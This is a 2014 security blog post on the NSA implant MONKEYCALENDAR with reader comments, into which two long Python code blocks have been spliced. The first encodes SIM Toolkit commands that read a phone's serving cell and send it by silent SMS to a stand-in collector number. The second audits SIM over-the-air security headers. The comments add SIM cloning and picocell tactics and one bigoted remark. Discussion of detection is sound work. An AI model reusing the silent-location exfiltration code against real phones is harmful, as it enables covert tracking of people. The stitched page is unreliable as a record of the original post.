MONKEYCALENDAR: NSA Exploit of the Day

Today's item from the NSA's Tailored Access Operations (TAO) group implant catalog:

MONKEYCALENDAR

(TS//SI//REL) MONKEYCALENDAR is a software implant for GSM (Global System for Mobile communication) subscriber identity module (SIM) cards. This implant pulls geolocation information from a target handset and exfiltrates it to a user-defined phone number via short message service (SMS).

(TS//SI//REL) Modern SIM cards (Phase 2+) have an application program interface known as the SIM Toolkit (STK). The STK has a suite of proactive commands that allow the SIM card to issue commands and make requests to the handset. MONKEYCALENDAR uses STK commands to retrieve location information and to exfiltrate data via SMS. After the MONKEYCALENDAR file is compiled, the program is loaded onto the SIM card using either a Universal Serial Bus (USB) smartcard reader or via over-the-air provisioning. In both cases, keys to the card may be required to install the application depending on the service provider's security configuration.

Unit Cost: $0

Status: Released, not deployed.

Page, with graphics, is here. General information about TAO and the catalog is here.

In the comments, feel free to discuss how the exploit works, how we might detect it, how it has probably been improved since the catalog entry in 2008, and so on.
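The catalog entry above says only that the implant "uses STK commands to retrieve location information and to exfiltrate data via SMS". The following is an added example, not code from the catalog or from this post, of what those two commands look like on the wire: a minimal SIM Toolkit BER-TLV encoder/decoder that builds the PROVIDE LOCAL INFORMATION proactive command, decodes the handset's TERMINAL RESPONSE, packs the result into a SEND SHORT MESSAGE proactive command, and then decodes that command the way a monitor on the SIM-ME interface could. Tag, command-type and device-identity values are those of the public specification (GSM 11.14 / ETSI TS 102 223); note that standard PROVIDE LOCAL INFORMATION returns the serving cell (MCC/MNC, LAC, cell ID), not a GPS fix. The cell values, the collector number +447700900123 and the "silent SMS" rule (no alpha identifier means the handset need not show the user anything) are constructed for this example.

```python
import struct

# Tags, command types and device identities from GSM 11.14 / ETSI TS 102 223.
TAG_PROACTIVE_CMD, TAG_COMMAND_DETAILS, TAG_DEVICE_IDENTITIES = 0xD0, 0x01, 0x02
TAG_RESULT, TAG_ALPHA_ID, TAG_ADDRESS, TAG_SMS_TPDU, TAG_LOCATION_INFO = 0x03, 0x05, 0x06, 0x0B, 0x13
CR = 0x80                                   # "comprehension required" bit on a simple TLV tag
CMD_SEND_SMS, CMD_PROVIDE_LOCAL_INFO = 0x13, 0x26
DEV_SIM, DEV_ME, DEV_NETWORK = 0x81, 0x82, 0x83
RESULT_OK = 0x00


def tlv(tag, value):
    """Simple TLV; lengths 128..255 get the 0x81 prefix."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    return bytes([tag, 0x81, len(value)]) + value


def unwrap(buf, expected_tag):
    """Value of a single TLV whose tag must be expected_tag."""
    if buf[0] != expected_tag:
        raise ValueError("unexpected tag %02X" % buf[0])
    length, i = buf[1], 2
    if length == 0x81:
        length, i = buf[2], 3
    return buf[i:i + length]


def parse_tlvs(buf):
    """Split a run of simple TLVs into (tag without CR bit, value) pairs."""
    out, i = [], 0
    while i < len(buf):
        tag, length, i = buf[i] & 0x7F, buf[i + 1], i + 2
        if length == 0x81:
            length, i = buf[i], i + 1
        out.append((tag, buf[i:i + length]))
        i += length
    return out


def encode_plmn(mcc, mnc):
    """MCC/MNC in the nibble-swapped coding of GSM 04.08 (2-digit MNC padded with F)."""
    m1, m2, m3 = (int(c) for c in mcc)
    n1, n2, n3 = (int(c, 16) for c in (mnc if len(mnc) == 3 else mnc + "F"))
    return bytes([(m2 << 4) | m1, (n3 << 4) | m3, (n2 << 4) | n1])


def decode_plmn(b):
    m1, m2, m3, n3, n1, n2 = b[0] & 0xF, b[0] >> 4, b[1] & 0xF, b[1] >> 4, b[2] & 0xF, b[2] >> 4
    return "%d%d%d" % (m1, m2, m3), "%d%d" % (n1, n2) + ("" if n3 == 0xF else str(n3))


def bcd_digits(number):
    """Reverse-nibble BCD address digits of GSM 03.40 (odd length padded with F)."""
    digits = number.lstrip("+")
    if len(digits) % 2:
        digits += "F"
    return bytes(int(digits[i + 1] + digits[i], 16) for i in range(0, len(digits), 2))


def decode_bcd(b):
    return "".join("%x%x" % (x & 0xF, x >> 4) for x in b).rstrip("f")


def proactive(cmd_type, cmd_number, qualifier, destination, *body):
    """Command details + device identities (SIM -> destination) + body, wrapped in tag D0."""
    inner = tlv(TAG_COMMAND_DETAILS | CR, bytes([cmd_number, cmd_type, qualifier]))
    inner += tlv(TAG_DEVICE_IDENTITIES | CR, bytes([DEV_SIM, destination]))
    return tlv(TAG_PROACTIVE_CMD, inner + b"".join(body))


def terminal_response_local_info(cmd_number, mcc, mnc, lac, cell_id):
    """Handset's reply to PROVIDE LOCAL INFORMATION (qualifier 00): serving cell. Constructed."""
    loc = encode_plmn(mcc, mnc) + struct.pack(">HH", lac, cell_id)
    return (tlv(TAG_COMMAND_DETAILS | CR, bytes([cmd_number, CMD_PROVIDE_LOCAL_INFO, 0x00]))
            + tlv(TAG_DEVICE_IDENTITIES | CR, bytes([DEV_ME, DEV_SIM]))
            + tlv(TAG_RESULT | CR, bytes([RESULT_OK]))
            + tlv(TAG_LOCATION_INFO | CR, loc))


def parse_location(terminal_response):
    loc = dict(parse_tlvs(terminal_response))[TAG_LOCATION_INFO]
    mcc, mnc = decode_plmn(loc[:3])
    lac, cell_id = struct.unpack(">HH", loc[3:7])
    return {"mcc": mcc, "mnc": mnc, "lac": lac, "cell_id": cell_id, "raw": loc}


def sms_submit(dest, payload):
    """Minimal SMS-SUBMIT TPDU (GSM 03.40): no validity period, PID 00, DCS 04 (8-bit data)."""
    digits = dest.lstrip("+")
    return (bytes([0x01, 0x00, len(digits), 0x91]) + bcd_digits(digits)
            + bytes([0x00, 0x04, len(payload)]) + payload)


def parse_sms_submit(tpdu):
    nbytes = (tpdu[2] + 1) // 2                  # tpdu[2] = number of address digits
    i = 4 + nbytes                               # PID, DCS, UDL follow the address
    return {"dest": "+" + decode_bcd(tpdu[4:4 + nbytes]), "dcs": tpdu[i + 1],
            "ud": tpdu[i + 3:i + 3 + tpdu[i + 2]]}


def send_sms_command(cmd_number, dest, payload, alpha_id=None):
    """SEND SHORT MESSAGE (SIM -> network). Without an alpha identifier the handset
    need not display anything, so the message leaves with no visible trace."""
    body = []
    if alpha_id is not None:
        body.append(tlv(TAG_ALPHA_ID | CR, alpha_id.encode("ascii")))
    body.append(tlv(TAG_ADDRESS | CR, bytes([0x91]) + bcd_digits(dest)))
    body.append(tlv(TAG_SMS_TPDU | CR, sms_submit(dest, payload)))
    return proactive(CMD_SEND_SMS, cmd_number, 0x00, DEV_NETWORK, *body)


def inspect_proactive(cmd):
    """Decode one fetched proactive command as a SIM-ME interface monitor would,
    flagging a SEND SHORT MESSAGE that carries no (or an empty) alpha identifier."""
    fields = dict(parse_tlvs(unwrap(cmd, TAG_PROACTIVE_CMD)))
    info = {"type": fields[TAG_COMMAND_DETAILS][1], "silent_sms": False}
    if info["type"] == CMD_SEND_SMS:
        sms = parse_sms_submit(fields[TAG_SMS_TPDU])
        info.update(destination=sms["dest"], payload=sms["ud"],
                    silent_sms=not fields.get(TAG_ALPHA_ID))
    return info


def demo():
    ask = proactive(CMD_PROVIDE_LOCAL_INFO, 1, 0x00, DEV_ME)            # SIM asks the handset
    resp = terminal_response_local_info(1, "234", "15", 0x1234, 0x5678)  # constructed reply
    loc = parse_location(resp)
    exfil = send_sms_command(2, "+447700900123", loc["raw"])            # 7-byte binary SMS
    return ask, loc, exfil, inspect_proactive(exfil)
```

Running `demo()` shows the whole 7-byte cell fix leaving in a single proactive command of 42 bytes, with `silent_sms` set because no alpha identifier is present. That flag is the practical detection hook: a baseband-side monitor (the approach of tools that watch the SIM-ME interface) can log every SEND SHORT MESSAGE the SIM issues on its own and compare the destination against numbers the user actually messaged.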

Posted on February 14, 2014 at 3:19 PM • 15 Comments

Comments

Clive Robinson • February 14, 2014 4:51 PM

The key detail here is,

    ...using either a Universal Serial Bus (USB) smartcard reader or via over-the-air provisioning. In both cases, keys to the card may be required to install the application depending on the service provider's security configuration

Some SIMs have reasonable quality crypto, others have single DES or security holes large enough to push a tank through.

Approximately 1/6 SIM cards are easily crackable today; back then it would have been over a third.

Further, contrary to expectation, not all service providers are that concerned about the security of SIM keys, which means "implanted employees" or "overnight black bag jobs" will get copies of them.

All that then has to happen is the handset associates with a "cell tower" controlled by the attacker and out goes the OTA message.

As has been indicated before, a couple of hundred bucks will buy you a Pico-Cell and the other bits (amp, directional antennas etc) to get the person in their home or office.

Alternatively a SIM can be "cloned" and just swapped by an operative who can get access to your phone for a couple of minutes. This works very effectively when a person is not using their "home network", so if "customs/immigration" borrow your phone assume it's been "owned"...

Preston L. Bannister • February 14, 2014 5:19 PM

For this particular case, when passing through customs, you could swap out your SIM card for a dummy. But that only covers this case.

The larger question: Is there any feasible way of performing an audit of the contents of your cell phone? Both internal storage and SIM card?

My take is that for phones with non-removable internal storage, you are pretty much out of luck. Since the phone boots off possibly-subverted software, using the phone's CPU to do an audit is dubious at best. Audit software could make phones more resistant to subversion, but only that.

If all storage in the phone were removable, then you could perform an audit on a known-clean system. That still does not protect against hardware hacks. The old rule that security requires control over physical access, still applies.

TenThousandDeathsAndStillDying • February 15, 2014 2:06 AM

This is one exploit I pretty much couldn't worry less about, it's kind of a dud. It's that tool in the bottom of the box you've never used and which no one knows the name of: something like a micrometer for the comparative measuring of tangents in irregular curves that is made to be used with astronaut gloves under water...

I don't worry much about GSM-anything in cell phones or anything else with cell-phone functionality (i.e. a SIM card or several).

This exploit is only useful/enabling against those who have SIMs at the extreme edges of coverage where "four+ circles" triangulation doesn't suffice: people on the edge of "nowhere" somewhere in the boonies or desert. For everybody else the TLAs will get their position at either higher or good-enough-anyway fidelity from simple service triangulation.

And I'll include remote gait detection in that: triangulation should do just fine for that as well against the vast amount of people. For other potential uses it's extremely unlikely the unlocked/military GSM (or service triangulation for that matter) has fidelity enough (request & reply propagation duration and queuing) to time your heartbeats or replace the use of the microphone(s) in eavesdropping/vibration detection, but if it did then I would be more concerned.

Hopefully some stupid politician or apparatchik gets the wrong idea from the contents of this post —Buran-time :)

Clive Robinson • February 15, 2014 4:51 AM

@ TenThousand...

    This exploit is only useful/enabling against those who have SIM's at the extreme edges of coverage where "four+ circles" triangulation doesn't suffice: people on the edge of "nowhere" somewhere in the boonies or desert

I guess you don't travel much... and have a US centric viewpoint.

This is a tool to use on people who move around a lot with their phone mainly turned off.

You turn it on anywhere in range of a cell tower and like the proverbial "linnet in a cage" it will sing out.

No problem with persons out of jurisdiction where getting the metadata from a service provider might be difficult politically or legally.

Further, no real issue with people faking their location using high gain antennas and long cable runs or active path extenders, because it's the phone's own GPS reading that is being sent, not the position fix on the "supposed" antenna.

There is also another issue: let's say you are "smarter than the average bear" and decide to remove or disable the GPS device in your phone... This system will tell those attackers with an interest and they can then just disable the phone so it becomes useless. You think you've bricked it yourself and thus don't be smart with your next phone...

Mike the goat • February 15, 2014 6:53 AM

Clive: this feels like deja vu. Weren't we speaking about just this topic only a short while ago?

I liked the concept of their other tool which monitored roaming to detect phones as they crossed into the United States. I expect that this would have real utility... until their targets wised up and stopped using cellphones altogether.

TenThousandDeathsAndStillDying • February 15, 2014 10:40 AM

Clive I think you've kind of proven my point about this exploit.

If one wants to turn off a phone these days one has to remove both the battery and the SIM(s). This tool isn't doing anything then.

I didn't consider people putting down half a kilometer of cable or relaying to the closest quarry, but if they're that clued in why would they have GSM or even use a local cell phone in the first place? Easier not to. Granted islam doesn't bring out the best or smartest in people so that's one explanation but it's still not much of an exploit as far as general added utility goes (the code could be a beauty).

There is no difference between the US and anywhere else. No constitution or law will be respected anywhere, no ethical boundary, no human right, and certainly no service provider defenses legal or otherwise: they might as well not be there. The only limiting factor is the reward to work ratio with an eye on future potential. If we/anyone wants to know how cows feel all we/they have to do is sit back and ruminate... :)

My phones and other SIM-enabled equipment do not have GSM, the phones each cost less than half a carton of cancer sticks, and globally their kind far outnumbers the etch-a-sketch 2.0 craze :)

Thankfully (both in this regard and many others except one or two in a few states) I am not a USian ("America" is dead; a piece of parchment covered in excrement and buried in a landfill, a ghost used for internal consumption): maybe it's counterintuitive but USians are the ones standing on the conveyor belt while the rest of the world (including MENA) are still in their pens unless they're both "valuable" and easy (politicians, power-brokers, terrorists) or the competition gets them.

Sure, the US isn't the only abattoir in town, I freely admit to that, but for me personally it is by far the biggest and closest one and like their closest competition (islam) they primarily eat their own (just as the USSR and the Third Reich did).

Clive Robinson • February 15, 2014 11:33 AM

@ Mike the Goat,

    Clive: this feels like deja vu. Weren't we speaking about just this topic only a short while ago?

Yes, here and other places. People tend to forget who really owns their phone... At the end of the day it's whoever owns the SIM and uses it to do implants etc...

@ TenThousand...

First off, the problem is not one of which deity --if any-- they chose to believe in (remember Jews, Christians and Muslims with all their different sects all believe in "the one God").

After all, Colombian drug barons, Chechen separatists and many others know from experience that the US with "rusty rivet" or similar can find sat phones and drop a modified anti-radar missile down the RF path when they are in use.

So sat phones are out, thus the next best thing is the mobile network in whichever country they might be in. Often the choice for various political and economic reasons is one supplier.

Now without going into the issues of Fresnel zones and similar, there are limits to what you can do with the RF side of mobile phones. The simplest is the "passive repeater", which is two high gain antennas connected by a length of low loss coax. You usually see this with TV service where coverage does not go into valleys etc. So one antenna is pointed at the base station; usually this is the highest gain antenna with narrowest beam width, as the base station generally does not "go walkabout". The user side is usually lower gain and designed to have a broad beam width to cover as much of the valley as possible. Such systems are simple and reliable but, importantly, cheap to implement and deploy and have a low footprint to surveillance.

What I would suggest these days is making a more complex system equivalent to a car hands-free kit which uses very high frequency EM in either the visible or near IR bands, and use simple optics --telescopes etc-- in shield tubes to reduce beam width to a minimum. This way the mobile can be stuck on the roof top of a hospital or water tower etc etc which even the NSA should regard as a "bad publicity" target.

Now before anyone accuses me of giving terrorists ideas, the IRA were using optical command systems to detonate what we now call IEDs and it's been well documented in the public arena.

Terrorists are in effect "irregular forces", so like other forces, irregular or not, they need to communicate in a timely manner. They could get amateur radio or CB or PMR systems or even WiFi, but these are all fairly obvious to the likes of "rusty rivet" and thus using them is a "self signed execution order" and they know it. So for all its defects mobile phones are still the best option available to them due to the number of users. It's well known that --supposedly-- AQ affiliated insurgents in Afghanistan use "burner" mobile phones for "spotter" / "indirect fire control" of heavy guns and mortars. UK/US forces use lightly modified consumer scanner equipment to get a warning of "spotters" but it's a problematic game in that it's only when they are under fire that they get local sigint.

But my personal view is this TAO method is not for terrorists but foreign government ministers and senior business men. And for this it's probably the best fit they are going to need to do the job.

If you care to think back to the Greek Olympics it's more than likely this or a similar method was in use.

Secret Police • February 15, 2014 12:34 PM

FBI uses OTA updates on SIMs to track or implant spyware. Telecoms are either giving the NSA access to their OTA update keys like they do the FBI or the NSA steals them.

A SIM physical wrapper like TurboSIM can block incoming OTA.

Secret Police • February 15, 2014 1:32 PM

Derp, of course you don't have to use a SIM at all. On Android you can randomize your wireless MAC on boot or on demand if you have root, then just use WiFi encrypted VoIP like the program Ostel.

Chris Abbott • February 15, 2014 7:42 PM

I'm dying to know what they've put in 4G SIMs, including those that go in CDMA phones (used almost exclusively by Americans). Even though Android is open-source, I also would love to know what's in the factory/stock builds, and of course in all the bloatware you aren't allowed to uninstall without root. My firewall on my Android reports that something is always trying to phone home. "Android System" constantly tries to connect to things. Any ideas?

tom • February 16, 2014 9:57 AM

"After the MONKEYCALENDAR file is compiled, the program is loaded onto the SIM card using either a Universal Serial Bus (USB) smartcard reader or via over-the-air provisioning. In both cases, keys to the card may be required to install the application depending on the service provider's security configuration."

NY Times yesterday, last paragraph:

"The Australians have obtained nearly 1.8 million encrypted master keys, which are used to protect private communications, from the Telkomsel mobile telephone network in Indonesia, and developed a way to decrypt almost all of them, according to a 2013 N.S.A. document."

"The Americans and the Australians secretly share broad access to the Indonesian telecommunications system, the documents show. The N.S.A. has given the Australians access to bulk call data from Indosat, an Indonesian telecommunications provider, according to a 2012 agency document."
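The sentence tom quotes ("keys to the card may be required ... depending on the service provider's security configuration") and Clive's remark above about SIMs that still use single DES both refer to the same thing: the security header of the over-the-air command packet defined in GSM 03.48 (now ETSI TS 102 225), which names the integrity and ciphering algorithms and key indices the card is expected to check before it accepts a remote command such as loading an applet. The following is an added example, not code from the catalog, from this post or from any commenter: a parser for that header plus a heuristic assessment of what a card that accepts a given header is exposed to. The field layout and bit codings are those of the public specification; the two sample packets, the TAR value, the placeholder checksum, the secured command (a GSM 11.11 SELECT 3F00 APDU) and the finding names are constructed for this example. The SMS user-data header that precedes the packet on the air is assumed already stripped. The last finding corresponds to the public SRLabs "Rooting SIM cards" result of 2013: a signed proof-of-receipt to a forged packet gives the attacker a MAC under a 56-bit key that can then be cracked offline.

```python
# Coding tables from GSM 03.48 section 5.1 (SPI, KIc, KID bytes).
SPI_INTEGRITY = ("none", "redundancy check", "cryptographic checksum", "digital signature")
SPI_COUNTER = ("no counter", "counter not checked", "accept if higher", "accept if one higher")
SPI_POR = ("no PoR", "PoR required", "PoR on error only", "reserved")


def describe_key_byte(b, role):
    """KIc (ciphering) or KID (integrity) byte: b2b1 algorithm, b4b3 mode, b8-b5 key index."""
    alg, mode, index = b & 0x03, (b >> 2) & 0x03, b >> 4
    if alg == 0b01:
        des_modes = ("DES CBC", "3DES two-key CBC", "3DES three-key CBC",
                     "DES ECB" if role == "KIc" else "reserved")
        name = des_modes[mode]
    else:
        name = ("implicitly known", None, "AES (ETSI TS 102 225)", "proprietary")[alg]
    # Single DES in either CBC or ECB mode gives a 56-bit key.
    return {"algorithm": name, "key_index": index, "single_des": alg == 0b01 and mode in (0, 3)}


def describe_spi(spi1, spi2):
    """First SPI byte: command security; second: proof-of-receipt (PoR) handling."""
    return {"integrity": SPI_INTEGRITY[spi1 & 3], "ciphered": bool(spi1 & 0x04),
            "counter": SPI_COUNTER[(spi1 >> 3) & 3],
            "por": SPI_POR[spi2 & 3], "por_integrity": SPI_INTEGRITY[(spi2 >> 2) & 3],
            "por_ciphered": bool(spi2 & 0x10),
            "por_via": "SMS-SUBMIT" if spi2 & 0x20 else "SMS-DELIVER-REPORT"}


def build_command_packet(spi1, spi2, kic, kid, tar, counter, rc_cc_ds, secured_data):
    """CPL | CHL | SPI(2) | KIc | KID | TAR(3) | CNTR(5) | PCNTR | RC/CC/DS | secured data.
    CPL counts everything from CHL onward; CHL counts SPI through RC/CC/DS."""
    header = bytes([spi1, spi2, kic, kid]) + tar + counter.to_bytes(5, "big") + b"\x00" + rc_cc_ds
    body = bytes([len(header)]) + header + secured_data
    return len(body).to_bytes(2, "big") + body


def parse_command_packet(pkt):
    cpl, chl = int.from_bytes(pkt[:2], "big"), pkt[2]
    if cpl != len(pkt) - 2 or chl < 13:           # 13 = fixed header bytes with no RC/CC/DS
        raise ValueError("malformed command packet")
    h = pkt[3:3 + chl]
    return {"spi": describe_spi(h[0], h[1]), "kic": describe_key_byte(h[2], "KIc"),
            "kid": describe_key_byte(h[3], "KID"), "tar": h[4:7].hex(),
            "counter": int.from_bytes(h[7:12], "big"), "padding": h[12],
            "rc_cc_ds": h[13:], "secured_data": pkt[3 + chl:]}


def assess(parsed):
    """Heuristic findings (constructed for this example) about a card that accepts this header."""
    s, kic, kid = parsed["spi"], parsed["kic"], parsed["kid"]
    findings = []
    if s["integrity"] not in ("cryptographic checksum", "digital signature"):
        findings.append("UNAUTHENTICATED")        # anyone who can deliver SMS-PP can command the card
    if kid["single_des"]:
        findings.append("KID_SINGLE_DES")         # 56-bit MAC key, brute-forceable offline
    if s["ciphered"] and kic["single_des"]:
        findings.append("KIC_SINGLE_DES")         # 56-bit confidentiality key
    if s["counter"] in ("no counter", "counter not checked"):
        findings.append("REPLAYABLE")             # a captured packet can be re-sent
    if s["por"] != "no PoR" and s["por_integrity"] == "cryptographic checksum" and kid["single_des"]:
        findings.append("DES_MAC_ORACLE_IN_POR")  # signed PoR to a forged packet leaks a DES MAC
    return findings


TAR = bytes.fromhex("000000")                     # constructed; TARs are operator-assigned
SELECT_MF = bytes.fromhex("A0A40000023F00")      # GSM 11.11 SELECT 3F00 as the secured command
PLACEHOLDER_CC = b"\x00" * 8                     # a real packet carries the DES/3DES MAC here

# Weak header: CC with single DES (KID 0x11), no counter, PoR on error signed with the same key.
WEAK = build_command_packet(0x02, 0x0A, 0x11, 0x11, TAR, 1, PLACEHOLDER_CC, SELECT_MF)
# Strong header: CC + ciphering, 3DES three-key (0x19), strict counter, signed PoR via SMS-SUBMIT.
STRONG = build_command_packet(0x1E, 0x29, 0x19, 0x19, TAR, 1, PLACEHOLDER_CC, SELECT_MF)

if __name__ == "__main__":
    for name, pkt in (("weak", WEAK), ("strong", STRONG)):
        print(name, pkt.hex(), assess(parse_command_packet(pkt)))
```

The header alone does not tell you whether a card will accept a packet; that is the card's own minimum-security profile per TAR, which is exactly the "service provider's security configuration" the catalog hedges on. What the parser does give an operator or a researcher with a SIM reader is a quick way to read back which algorithm and key index a provider's OTA traffic actually names, and the findings list is the checklist to run against it.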

Knott Whittingley • February 17, 2014 3:25 PM

Has anybody ever done a study of password capture by seeing what passwords people mistakenly type at the username/login/handle prompt, or into the password field if the first password they try doesn't work?

Seems to me that's got to be an effective way of capturing a lot of people's passwords for various accounts. I would guess that most people space out and type their password prematurely sometimes, or if a password doesn't work, they try other passwords they frequently use, rather than remembering for sure which password goes with which account.

I don't recall ever seeing this mentioned, but I'm not a security person. I've been wondering about it for years.

01 • February 21, 2014 4:04 AM

While I don't share TenThousand's paranoid outlook on triangulation (unless the area the target happens to be in is a Flatland-style plain with no landscape, buildings, or interference to speak of), the operational utility of this little thingamajig seems limited to situations where you absolutely have to pillage the phone's own geolocation data or the provider is grossly negligent about its keys (happens more often than one would like to think).

Still, it would be interesting to learn how to block SIM OTA updates (one obvious route, for older SIMs, would be to clone them yourself using some of the "researcher programmable SIM toolkits" which have a notably crippled SIM Toolkit functionality).

TurboSIM/podsimka seems interesting in this regard, but one has to wonder how reliable it is, given that OTA suppression isn't exactly the functionality those kits were designed for in the first place.


Schneier on Security is a personal website. Opinions expressed are not necessarily those of Co3 Systems, Inc.